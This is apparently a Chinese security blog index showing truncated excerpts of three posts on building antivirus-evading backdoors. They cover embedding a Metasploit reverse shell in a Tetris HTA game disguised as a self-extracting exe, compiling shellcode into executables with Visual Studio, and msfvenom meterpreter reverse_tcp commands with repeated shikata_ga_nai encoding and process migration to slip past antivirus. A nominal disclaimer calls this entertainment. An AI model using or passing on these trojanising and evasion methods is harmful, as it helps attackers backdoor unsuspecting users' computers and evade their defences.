俄罗斯方块加入反弹后门方法(免杀)

注:免责申明,该方法只是用来娱乐,切勿做任何违法行为。一、主要步骤:1.制作一个hta(http application)游戏,文中用的是俄罗斯方块2.用msf生成一个hta-psh 嵌入到hta游戏里面3.用rar压缩文件把hta压缩成一个自动解压的exe文件,并自定义一个程序图标(安全,过杀软)最终效果如下: 开始: 1.制作一个hta游戏,俄罗斯方块,hta代码如下:(也可以找其他游戏替代) 将下列代码保存为后缀为hta文件,打开看看能不能运行,然后继续…. 2.用msf生成一个hta-psh 嵌入到hta游戏里面 使用msfconsole -n进入msf(最新版msf需要进入后才能使用msfvenom命令) msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=2333 -f ht […]

查看全部


使用vs2017把shellcode编译成exe运行

1.打开vs2017 C++开发(如果把shellcode生成linux下的elf文件,需要对应的linux shellcode payload,并安装vs2017 linux开发功能,其它如下流程完成即可),新建一个项目: 2.选择好visual C++,然后选择 Windows桌面应用程序,如果是为了把msf生成的shellcode编译成免杀exe,一定要选这个。选其它的生成的exe会报错,或者黑框框一闪而过。然后设置一下这个项目即将保存的路径,点击确定就好。 3.选择要生成的exe版本(debug/release),还有就是对应的x86还是x64系统上运行。然后把你msf生成的shellcode或者自己写的shellcode丢进来。 4.选择调试—->属性,来配置即将生成的exe相关设置。 5.设置”代码生成”功能,”启用最小重新 […]

查看全部


使用shellcode制作免杀payload

1.shellcode具体怎么生成,可以借助cobalt straike 或者msf,还可以自己折腾 2.这里举例msf msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444  -e x86/shikata_ga_nai  -i  16  PrependMigrate=true PrependMigrateProc=php-cgi.exe  -f c> shell.c   多次尝试使用x86/shikata_ga_nai 编码十五六次后,生成的shellcode用vs2007 生成exe文件,可以过杀软,360或者安全管家   这里主要说明两个参数: PrependMigrate 设置为true以后,shellcode注入后将会实现进程注入,具体要注入到什么进程里, […]

查看全部